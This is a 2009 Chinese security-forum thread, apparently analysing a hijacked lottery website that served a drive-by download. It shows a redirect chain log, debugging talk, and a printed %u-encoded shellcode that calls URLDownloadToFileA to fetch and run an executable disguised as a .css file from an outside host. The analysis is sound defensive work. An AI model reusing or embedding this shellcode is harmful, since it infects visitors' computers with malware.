http://www.liuhecai08.sd.cn/(挂马)

显示全部楼层 · 发表于 2009-7-3 15:22:25

Log is generated by FreShow.
[wide]http://www.liuhecai08.sd.cn/Articledetail.asp?id=209
[script]http://cn.com.fengyunfz.com.cn/count/js/gif.gif
      [frame]http://cn.com.fengyunfz.com.cn/images/images/bf.htm
         [script]http://cn.com.fengyunfz.com.cn/images/images/sfbf.css
            [object]http://ilovefzl.ilovefzl.com.cn/images/images/js.css
      [frame]http://cn.com.fengyunfz.com.cn/images/images/swf.htm
      [frame]http://cn.com.fengyunfz.com.cn/images/images/real2.htm
         [object]http://ilovefzl.ilovefzl.com.cn/images/images/js.css
         [object]http://dz.us.net/bak.css
      [frame]http://cn.com.fengyunfz.com.cn/images/images/old.htm
      [frame]http://cn.com.fengyunfz.com.cn/images/images/09002.htm
      [frame]http://cn.com.fengyunfz.com.cn/images/images/tj.htm
[script]http://cn.com.fengyunfz.com.cn/count/js/gif.gif
[script]http://js.tongji.yahoo.com.cn/1/142/143/ystat.js

显示全部楼层 · 发表于 2009-7-3 16:22:37

hxxp://ilovefzl.ilovefzl.com.cn/images/images/js.css得od调试才能出来吧不会啊那玩意太高级
alert的话指出来hxxp://ilovefzl.ilovefzl.com.cn/ 后面乱码了

显示全部楼层 · 发表于 2009-7-3 17:30:20

原帖由 xiaoqiang305 于 2009-7-3 16:22 发表
hxxp://ilovefzl.ilovefzl.com.cn/images/images/js.css得od调试才能出来吧不会啊那玩意太高级
alert的话指出来hxxp://ilovefzl.ilovefzl.com.cn/ 后面乱码了

http://ilovefzl.ilovefzl.com.cn/images/images/js.css是EXE程序吧

不是要解密的对象。所以当然是解不出的啦
用od调试可以得到下载表列倒是真的

[ 本帖最后由 taoyuan237 于 2009-7-3 17:31 编辑 ]

显示全部楼层 · 发表于 2009-7-3 18:14:39

我说的就是这个js的得用od调试才能得出来

不是去调试js ，我上面说的不是这个意思么？

[ 本帖最后由 xiaoqiang305 于 2009-7-3 18:16 编辑 ]

显示全部楼层 · 发表于 2009-7-3 19:55:59

不用ＯＤ，这个你不是说过md5加密嘛，怎么就忘了。

显示全部楼层 · 发表于 2009-7-3 20:45:19

http://ilovefzl.ilovefzl.com.cn/images/images/js.css 现在是个可执行文件.

显示全部楼层 · 发表于 2009-7-3 22:09:30

恩但md5解密之后是shellcode ，xor猜不到，没解出，所以猜应该使od能调出来，不用od怎么弄的呢

显示全部楼层 · 发表于 2009-7-3 22:23:47

%u56e8%u0000%u5300%u5655%u8b57%u246c%u8b18%u3c45%u548b%u7805%uea01%u4a8b%u8b18%u205a%ueb01%u32e3%u8b49%u8b34%uee01%uff31%u31fc%uacc0%ue038%u0774%ucfc1%u010d%uebc7%u3bf2%u247c%u7514%u8be1%u245a%ueb01%u8b66%u4b0c%u5a8b%u011c%u8beb%u8b04%ue801%u02eb%uc031%u5e5f%u5b5d%u08c2%u5e00%u306a%u6459%u198b%u5b8b%u8b0c%u1c5b%u1b8b%u5b8b%u5308%u8e68%u0e4e%uffec%u89d6%u53c7%u8e68%u0e4e%uffec%uebd6%u5a50%uff52%u89d0%u52c2%u5352%uaa68%u0dfc%uff7c%u5ad6%u4deb%u5159%uff52%uebd0%u5a72%u5beb%u6a59%u6a00%u5100%u6a52%uff00%u53d0%ua068%uc9d5%uff4d%u5ad6%uff52%u53d0%u9868%u8afe%uff0e%uebd6%u5944%u006a%uff51%u53d0%u7e68%ue2d8%uff73%u6ad6%uff00%ue8d0%uffab%uffff%u7275%u6d6c%u6e6f%u642e%u6c6c%ue800%uffae%uffff%u5255%u444c%u776f%u6c6e%u616f%u5464%u466f%u6c69%u4165%ue800%uffa0%uffff%u2e2e%u785c%ue800%uffb7%uffff%u2e2e%u785c%ue800%uff89%uffff%u7468%u7074%u2f3a%u692f%u6f6c%u6576%u7a66%u2e6c%u6c69%u766f%u6665%u6c7a%u632e%u6d6f%u632e%u2f6e%u6d69%u6761%u7365%u692f%u616d%u6567%u2f73%u736a%u632e%u7373%u0000

复制代码

显示全部楼层 · 发表于 2009-7-3 22:53:05

找到问题所在了双斜线后面的我也给算进去了导致代码不正常这回好了

BenQ19 =unescape("md57365");//("md55c4fmd53a4emd5227dmd53c5cmd57943md56562md52d72md526873")

显示全部楼层 · 发表于 2009-7-3 23:33:52

[已鉴定] http://www.liuhecai08.sd.cn/(挂马)

回复 3楼 taoyuan237 的帖子

回复 5楼 shadowmin 的帖子

评分